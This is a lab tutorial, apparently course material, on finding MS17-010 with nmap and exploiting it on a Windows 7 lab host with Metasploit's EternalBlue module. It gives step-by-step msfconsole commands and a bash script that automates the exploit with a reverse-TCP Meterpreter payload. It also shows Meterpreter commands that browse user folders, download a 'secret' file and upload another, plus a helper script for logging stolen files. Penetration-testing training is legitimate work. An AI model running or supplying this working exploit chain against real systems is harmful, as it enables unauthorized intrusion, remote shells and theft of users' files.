(8) Vulnerability Scanning and MS17-010 Exploit

Uploaded by Prasanth Kumar
Vulnerability scanning using nmap

NSE – Nmap Scripting Engine

Nmap supports scripts: a user can write their own NSE scripts to check a target device for vulnerabilities, or use the scripts that ship with nmap. The scripts are grouped into categories according to what the user needs, and --script followed by a category name runs every script in that category against the target. Let's assume a user wants to scan a target device for vulnerabilities:

nmap --script vuln 192.168.1.10

Please choose your Windows 7 IP from ilabs!
If the target is vulnerable to any of the checks, nmap lists the vulnerabilities it found for that host. In this case we are looking for EternalBlue (MS17-010), which nmap reports through its smb-vuln-ms17-010 script.

Nmap shows that the target system is vulnerable to MS17-010.
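The vuln category runs every vulnerability script, which is slow and noisy. When MS17-010 is the only question, a targeted scan of port 445 with the one script is faster, and the result should be read as three states, not two: vulnerable, checked and not vulnerable, or never checked (port closed, SMBv1 off, script error). The script below is an added example, not part of the original tutorial: it runs that targeted scan when given a host, and parses nmap's normal output. The sample outputs embedded in it are constructed for offline testing; nmap is assumed to be installed when the scan function is actually called.

```bash
#!/usr/bin/env bash
# Added example (not from the original tutorial): targeted MS17-010 check
# using nmap's smb-vuln-ms17-010 NSE script plus a parser for its output.
# Assumes nmap is installed when scan_ms17_010 is invoked; the sample
# outputs below are constructed, not captured from a real host.

# Scan only the SMB port with the one script we care about. "-oN -" writes
# normal-format output to stdout so it can be piped into the parser.
scan_ms17_010() {
  nmap -p445 --script smb-vuln-ms17-010 -oN - "$1"
}

# Read nmap normal output on stdin.
#   returns 0  host reported "State: VULNERABLE" by smb-vuln-ms17-010
#   returns 1  the script produced a block but no VULNERABLE state
#              (includes script errors, so look at the block before trusting it)
#   returns 2  no smb-vuln-ms17-010 block at all: the check never ran
#              (445 closed/filtered, SMBv1 disabled), NOT a clean result
parse_ms17_010() {
  local block
  # keep the script's own lines (they start with "|"), stop at the first line after them
  block=$(awk '/smb-vuln-ms17-010/{f=1} f&&/^[|]/{print; next} f{exit}')
  [ -n "$block" ] || return 2
  printf '%s\n' "$block" | grep -q 'State: VULNERABLE' && return 0
  return 1
}

# Constructed sample: vulnerable host (shape follows nmap's normal output).
SAMPLE_VULNERABLE='Nmap scan report for 192.168.1.10
Host is up (0.00052s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|_      servers (ms17-010).
'

# Constructed sample: port open but the script produced nothing (e.g. SMBv1 off).
SAMPLE_NO_RESULT='Nmap scan report for 192.168.1.11
Host is up (0.00061s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
'

# Constructed sample: the script ran but failed, so no state was reported.
SAMPLE_ERROR='Nmap scan report for 192.168.1.12
Host is up (0.00048s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)
'

# Run a live scan when a target is given on the command line.
if [ -n "${1:-}" ]; then
  scan_ms17_010 "$1" | parse_ms17_010
  case $? in
    0) echo "$1: VULNERABLE to MS17-010" ;;
    1) echo "$1: script ran, no VULNERABLE state reported (inspect the output)" ;;
    *) echo "$1: no smb-vuln-ms17-010 result; port closed, SMBv1 off, or scan error" ;;
  esac
fi
```

Usage: ./check_ms17.sh 192.168.1.10 (your Windows 7 IP from ilabs). The three-way exit code matters when this feeds a report: a host that was never checked must not be written up as "not vulnerable".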
Now we exploit the target system using the MS17-010 vulnerability.

Step 1: we use the Metasploit Framework console to exploit this vulnerability. To start it, type

msfconsole

Step 2: now search for the exploit. In msfconsole type

search ms17-010

Step 3: msfconsole lists the matching modules. We choose one of them by its index in the search results (here the first, index 0):

use 0
Step 4: now we need to see the options the module takes, including the target IP address:

show options

Step 5: set the target IP address:

set RHOSTS 192.168.1.129

NOTE: RHOSTS is the Windows 7 IP from ilabs.


Step 6: finally, cross-check LHOST and LPORT.

LHOST is the Kali Linux IP address, the one the target connects back to.

LPORT is the port on which Kali receives the connection from the target. Any port that is not already in use on Kali will do; pick one such as:

ex: 1234, 8080, 4040, 4444, 3030, 7070, 7001, 7002


Step 7: now exploit the system by typing

run

You will see msfconsole connect to the target system. If you get WIN at the end, you have compromised the system successfully.

NOTE: in some cases the exploit does not work on the first try; run the command again.

Now you can run screenshot, sysinfo and ipconfig in the Meterpreter session to see details of the compromised system.
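Steps 1 to 7 are a fixed sequence of console commands, so they can be driven from a Metasploit resource script instead of typed one by one, with the RHOSTS/LHOST/LPORT values checked before msfconsole is launched (a mistyped LHOST or an LPORT already in use is the usual reason the exploit reports success but no session appears). The script below is an added example, not part of the original tutorial or of Metasploit itself. It assumes msfconsole is installed, that the chosen module is exploit/windows/smb/ms17_010_eternalblue with its standard RHOSTS, LHOST, LPORT and PAYLOAD options, and that the target is 64-bit Windows 7 (the payload is an assumption; change it for an x86 target). The IP addresses used in the usage note are constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the original tutorial): run the MS17-010 steps
# from a Metasploit resource script with pre-flight checks on the options.
# Assumptions: msfconsole is installed; module path and option names are
# Metasploit's; the x64 Meterpreter payload suits a 64-bit Windows 7 target.

# Accept only a dotted-quad IPv4 address with four octets in 0..255.
valid_ipv4() {
  local ip=$1 o
  case $ip in
    *[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  local IFS=.
  set -- $ip
  [ $# -eq 4 ] || return 1
  for o in "$@"; do
    [ "$o" -le 255 ] 2>/dev/null || return 1
  done
}

# LPORT must be a real port number and not already bound on this (Kali) box,
# otherwise the handler cannot listen and the shell never arrives.
# The bind check uses ss and is skipped when ss is not installed.
port_free() {
  local p=$1
  case $p in ''|*[!0-9]*) return 1 ;; esac
  [ "$p" -ge 1 ] && [ "$p" -le 65535 ] || return 1
  if command -v ss >/dev/null 2>&1; then
    ! ss -ltn 2>/dev/null | awk '{print $4}' | grep -q ":$p\$"
  fi
}

# Emit the resource script: the same commands as steps 3, 5, 6 and 7.
build_ms17_010_rc() {
  local rhost=$1 lhost=$2 lport=$3
  cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhost
set LHOST $lhost
set LPORT $lport
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
EOF
}

# Validate, write the .rc to a temp file, and hand it to msfconsole.
# -q suppresses the banner; -r runs the file and then leaves the console
# interactive, so "run" can simply be typed again if the first attempt fails.
run_ms17_010() {
  local rhost=$1 lhost=$2 lport=${3:-4444} rc
  valid_ipv4 "$rhost" || { echo "bad RHOSTS: $rhost" >&2; return 2; }
  valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 2; }
  port_free "$lport"  || { echo "LPORT $lport invalid or already in use" >&2; return 2; }
  rc=$(mktemp)
  build_ms17_010_rc "$rhost" "$lhost" "$lport" > "$rc"
  msfconsole -q -r "$rc"
  rm -f "$rc"
}

if [ $# -ge 2 ]; then
  run_ms17_010 "$@"
fi
```

Usage: ./ms17_010.sh 192.168.1.129 192.168.1.5 4444, where the first address is the Windows 7 target (RHOSTS), the second is Kali (LHOST) and the third is LPORT. The pre-flight checks fail fast with exit status 2 before Metasploit starts, which is where a practitioner wants the error to surface.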
Continuation of MS17-010

After gaining access to the target system, check where our Meterpreter session is by typing:

pwd

On the Windows system the session starts in C:\Windows\System32. To see the user's Documents, Downloads, Pictures, Videos and so on, we need to change directory

from C:\Windows\System32 → C:\Users\jon\Downloads

Type dir to list the files.

The next step is to move into the Users folder. A bare cd is relative to the current directory, so from C:\Windows\System32 go up with cd .. first or give the full path:

cd Users and type dir to see the folders in Users.

Now let's move into the jon folder; here jon is the username on the computer, and we can see there is another user called dark too.

cd jon and type dir; we can see the Desktop, Downloads and Documents folders.

Let's move into the Downloads folder to see whether there are any important files:

cd Downloads

In the next step let's download the secret.txt.txt file to our Kali Linux machine. To download a file from the target machine we use the download command followed by the file name:

download secret.txt.txt

The file has been downloaded to our Linux machine, into the directory msfconsole was started from. Open a new terminal there and type ls to list the files:

ls

To upload a file from the Linux machine to the Windows machine we use the upload command followed by the name of the file to upload.

Before uploading, create a text file with some random text in it. Then upload the hacked.txt file to the Windows system:

upload hacked.txt
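A download taken from a target is evidence, and it is worth recording immediately what was pulled, from where, and its hash, so the local copy can later be matched against the original and a failed or misplaced download is not mistaken for a good one. The helper below is an added example, not part of the original tutorial or of Metasploit; it is run in the Kali terminal after the Meterpreter download command. The loot.log file name and the sample file used in the usage note are hypothetical, and it assumes sha256sum (or shasum) is available.

```bash
#!/usr/bin/env bash
# Added example (not from the original tutorial): record a file pulled with
# Meterpreter's download command together with its SHA-256.
# Assumptions: sha256sum or shasum is installed; loot.log is a hypothetical
# file name chosen for this example.

# SHA-256 of a local file, using whichever tool the box has.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# log_loot <source host> <remote path> <local file> [log file]
# Appends one tab-separated record: UTC time, host, remote path, local path,
# size in bytes, SHA-256. Prints the hash. Returns 1 without logging if the
# local file is missing (typically: download ran from another directory),
# so the log never claims a copy that does not exist.
log_loot() {
  local host=$1 remote=$2 local_file=$3 log=${4:-loot.log} size hash
  [ -f "$local_file" ] || { echo "missing: $local_file" >&2; return 1; }
  size=$(wc -c < "$local_file" | tr -d ' ')
  hash=$(sha256_of "$local_file")
  printf '%s\t%s\t%s\t%s\t%s\t%s\n' \
    "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$host" "$remote" "$local_file" "$size" "$hash" \
    >> "$log"
  printf '%s\n' "$hash"
}

if [ $# -ge 3 ]; then
  log_loot "$@"
fi
```

Usage after the download above: ./log_loot.sh 192.168.1.129 'C:\Users\jon\Downloads\secret.txt.txt' ./secret.txt.txt. Running it for uploaded files (hacked.txt) as well gives a record of every artifact placed on the target, which is what the cleanup at the end of an engagement is checked against.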
